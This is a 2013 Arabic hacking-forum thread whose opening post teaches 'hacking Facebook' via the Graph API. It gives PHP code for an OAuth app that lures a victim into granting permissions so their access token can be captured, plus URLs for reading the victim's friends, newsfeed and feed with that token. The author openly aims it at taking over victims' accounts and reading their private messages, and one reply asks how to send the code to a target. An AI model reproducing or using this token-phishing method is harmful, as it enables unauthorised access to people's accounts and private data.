التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم الـبـريد الإلـكتروني والحسابات العامة

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 12-21-2013, 07:38 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Twi[L]ighT Dz
:-. Soldier of Allah .-:
 
الصورة الرمزية Twi[L]ighT Dz
 

 

 
إحصائية العضو






Twi[L]ighT Dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 15
Twi[L]ighT Dz is on a distinguished road

افتراضي رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


السلام عليكم و رحمة الله تعالى و بركاته

كيف حالكم عناكب

اليوم أنا جاي أشرح لكم إستغلالات ثغرة في الفايسبوك
هي صعبة قليلا لكن أتمنى أن تتجاوبوا معي
تمام نبدأ على بركة الله


Graph API Exploit

كما يعلم الكل أن الفايسبوك يحتوي على ملايين المشتركين
و بالتالي فهو يمثل المكان الأمثل لتطبيق مخططاتنا في الإختراق

Graph API Exploit

رغم أن هاته الثغرة إستغلالاتها خطيرة
و أغلب المبرمجين الآن يستغلونها في التحكم بحسابات الفايسبوك
لأن المعلومات التي تقدمها مهمة جدا
إلا أنني لا أجد لها شروحات في المنتديات هناك من سيقول أن الثغرة تافهة
أنا أقولك لا أغلب الإستغلالات بقيت خاصة بمكتشفيها و لم يتم تسريبها في المنتديات
لخطروة إستغلالاتها

فبخبرة قليلة من البرمجة تتمكن من قراءة الرسائل الخاصة لأي حساب تريد
أو إرسال رسائل بأي حساب على الفايسبوك
دون أن ننسى أنها تقدم لنا معلومات تمكننا من إختراق الفايسبوك الهدف


ما هو ال Facebook Graph Api ؟

هو الرسم البياني لل Api
أي جوهر منصة الفايسبوك

برمجة منصة الفاسيبوك مبنية على Graph api
و من يستطيع التحكم في ال api
سيتمكن من قراءة و كتابة معطيات في الفايسبوك
بل سيطلق ثورة في إختراق الفايسبوك

الآن هل تريدون اللعب بال Graph Api ؟

حقا ؟

أوكي تابعوا معي الآتي

جرب أكتب الآتي

https://graph.facebook.com/username

غير Username بحساب الضحية
تطلعلك معلومات كالآتي:

كود:
{    "id": "10000000565",    "name": "name of victim",    "first_name": "f name",    "last_name": "l name",    "link": "http://www.facebook.com/victim",    "username": "victim",    "gender": "male",    "locale": "en_GB" }
قراءة طلبات الصداقة للضحية :

تتم قراءة طلبات الصداقة للمستهدف من خلال قراءة Graph Api عن طريق إصدار

طلب "HTTP GET" لمستخدم access_token بإذن أو رخصة read_requests

التطبيق في المتصفح كالآتي:

كود:
https://graph.facebook.com/USER_ID/friendrequests
مع العلم أن :
USER_ID = username
www.facebook.com/username


و عن كيفية الإستغلال
عبارة عن CODE PHP بسيط يوضح الإستغلال في قراءة طلبات الصداقة للضحايا



كود PHP:

<?php
    $app_id 
'YOUR_APP_ID';
    
$app_secret 'YOUR_APP_SECRET';
    
$my_url 'YOUR_URL';
    
$code $_REQUEST["code"];
    echo 
'<html><body>';
    if(!
$code) {
    
// Get permission from the user to publish to their page.
    
$dialog_url "http://www.facebook.com/dialog/oauth?client_id="
    
$app_id "&redirect_uri=" urlencode($my_url)
    . 
"&scope=read_requests";
    echo(
'**********top.location.href="' $dialog_url '";</script>');
    } else {
    
// Get access token for the user
    
$token_url "https://graph.facebook.com/oauth/access_token?client_id="
    
$app_id "&redirect_uri=" urlencode($my_url)
    . 
"&client_secret=" $app_secret
    
"&code=" $code;
    
$access_token file_get_contents($token_url);
    
$notifications "https://graph.facebook.com/me/friendrequests?"
    
$access_token;
    
$response file_get_contents($notifications);
    
$resp_obj json_decode($response,true);
    echo 
'<pre>';
    
print_r($resp_obj);
    echo 
'</pre>';
    }
    echo 
'</body></html>';
    
?>
إذا أردت رؤية الأشخاص الذي عمل لهم بلوك


كود:
https://graph.facebook.com/APP_ID/banned
إذا أردت رؤية إن كان عمل لشخص محدد بلوك


كود:
https://graph.facebook.com/APP_ID/banned/USER_ID
سأوضح أكثر الإستعمال بالمتصفح


https://graph.facebook.com = API GRAPH
بروفايل الفايسبوك المستهدف = /me/
متغير يمكننا تغييره بحسب الحاجة مثلا أردت رؤية = friendsnewsfeed أغيره إلى "home"
227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

يمثل ال access_token

و يجب الحصول عليه من الضحية

بما أن البعض لم يفهم عمل ال php code
هو يستعمل فقط لقراة طلبات الصداقة ..الرسائل ...
ما إلى ذلك يمكنكم التعديل عليه ليتماشى مع الحاجة

بخصوص الحصول على الـ access_token
سهل عن طريق تطبيق فايسبوك





ضروري تغيير /me/ بــ username الشخص المستهدف

و بالتالي الإستغلال يكون كالآتي :


لرؤية طلبات الصداقة للضحية

كود:
https://graph.facebook.com/me/friends?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
لروية newsfeed للضحية


كود:
https://graph.facebook.com/me/home?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
لرؤية profile freed
يعني رؤية البروفايل www.fb.com/username

كود:
https://graph.facebook.com/me/feed?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

أتمنى أن أكون اليوم بشرحي هذا لكم قد وفقت في توضيح بعض الأمور لكم
حتى و لو كانت قليلة و لكنها مجرد بداية

ستمكنكم من دخول إختراق الفايسبوك من بابه الواسع
هي مجرد فكرة و أنتظر منكم تطوريها

و أي شيء أنا هنا في الخدمة






vcdm Hovn td Yojvhr hgthdsf,; feyvm Graph API Exploit

التوقيع

 


التعديل الأخير تم بواسطة Twi[L]ighT Dz ; 01-04-2014 الساعة 02:26 AM.

   

رد مع اقتباس
قديم 12-22-2013, 12:34 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية PsYcO_GhOsT
 

 

 
إحصائية العضو







PsYcO_GhOsT غير متواجد حالياً

إرسال رسالة عبر Skype إلى PsYcO_GhOsT

 

 

إحصائية الترشيح

عدد النقاط : 10
PsYcO_GhOsT is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


انا لم افهم اي شى لكن شكرا جزيلا ايها المبدع
تقبل مروري

   

رد مع اقتباس
قديم 12-22-2013, 02:32 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
Twi[L]ighT Dz
:-. Soldier of Allah .-:
 
الصورة الرمزية Twi[L]ighT Dz
 

 

 
إحصائية العضو






Twi[L]ighT Dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 15
Twi[L]ighT Dz is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة PsYcO_GhOsT
انا لم افهم اي شى لكن شكرا جزيلا ايها المبدع
تقبل مروري

مالذي لم تفهمه أستطيع أن أوضح لك

و لو كان يجب أن أعمل لكم شرح فيديو أنا في الخدمة

شكرا على مرورك
التوقيع

 

   

رد مع اقتباس
قديم 12-23-2013, 01:33 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية saaddev
 

 

 
إحصائية العضو






saaddev غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
saaddev is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


thnxxxxxxxxxxxxx

   

رد مع اقتباس
قديم 12-23-2013, 02:00 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
Twi[L]ighT Dz
:-. Soldier of Allah .-:
 
الصورة الرمزية Twi[L]ighT Dz
 

 

 
إحصائية العضو






Twi[L]ighT Dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 15
Twi[L]ighT Dz is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة saaddev
thnxxxxxxxxxxxxx


your welcome bro
التوقيع

 

   

رد مع اقتباس
قديم 12-28-2013, 01:31 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية mario love
 

 

 
إحصائية العضو






mario love غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mario love is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


nice

   

رد مع اقتباس
قديم 12-29-2013, 05:28 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية xbahaa
 

 

 
إحصائية العضو






xbahaa غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
xbahaa is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


مشكور اخيييييييييييييي ر اشوف اشرح بدي اضهر الرابط الان

   

رد مع اقتباس
قديم 12-29-2013, 07:34 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية xDrKeeFx
 

 

 
إحصائية العضو






xDrKeeFx غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
xDrKeeFx is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


جزاك الله الف خير , بميزان حسناتك

   

رد مع اقتباس
قديم 12-29-2013, 07:53 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
Twi[L]ighT Dz
:-. Soldier of Allah .-:
 
الصورة الرمزية Twi[L]ighT Dz
 

 

 
إحصائية العضو






Twi[L]ighT Dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 15
Twi[L]ighT Dz is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


شكرا على الردود المشجعة

جزاكم الله ألف خير

إن شاء الله
التوقيع

 

   

رد مع اقتباس
قديم 12-29-2013, 09:54 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية oussema97
 

 

 
إحصائية العضو






oussema97 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
oussema97 is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


so nice

   

رد مع اقتباس
قديم 12-31-2013, 05:20 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية soufien
 

 

 
إحصائية العضو






soufien غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
soufien is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


Merci

   

رد مع اقتباس
قديم 12-31-2013, 06:56 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية haithemm
 

 

 
إحصائية العضو





haithemm غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
haithemm is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


shoukraaaan

   

رد مع اقتباس
قديم 12-31-2013, 04:45 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Fsx
 

 

 
إحصائية العضو






Fsx غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Fsx is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


شكرا لك يا اخي ولكن لم افهم كيفية استخدام ال PHP CODE للحصول على ال ACESS TOKEN ، هل يجب تحميله في موقع و ارساله للشخس المراد إختراقه ؟

التوقيع

للمراسلة

Time-of-world@live.fr

 

   

رد مع اقتباس
قديم 12-31-2013, 05:17 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية dragunov _dz
 

 

 
إحصائية العضو







dragunov _dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dragunov _dz is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


الطريقة مو شغالة

   

رد مع اقتباس
قديم 01-01-2014, 06:08 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية أسطوره
 

 

 
إحصائية العضو







أسطوره غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
أسطوره is on a distinguished road

افتراضي رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit


عليكم السلام رحمه الله بركاته

اشكرك اخي الفاضل علي الموضوع المميز

اشكر كل عضو مميز في المنتدي اكثر من روعه تقبلوا خالص تحياتي وتقدري
انا عضو جديد في هذا المنتدي الذي دائما يطرح كل ماهو جديد ومفيد

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 07:45 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0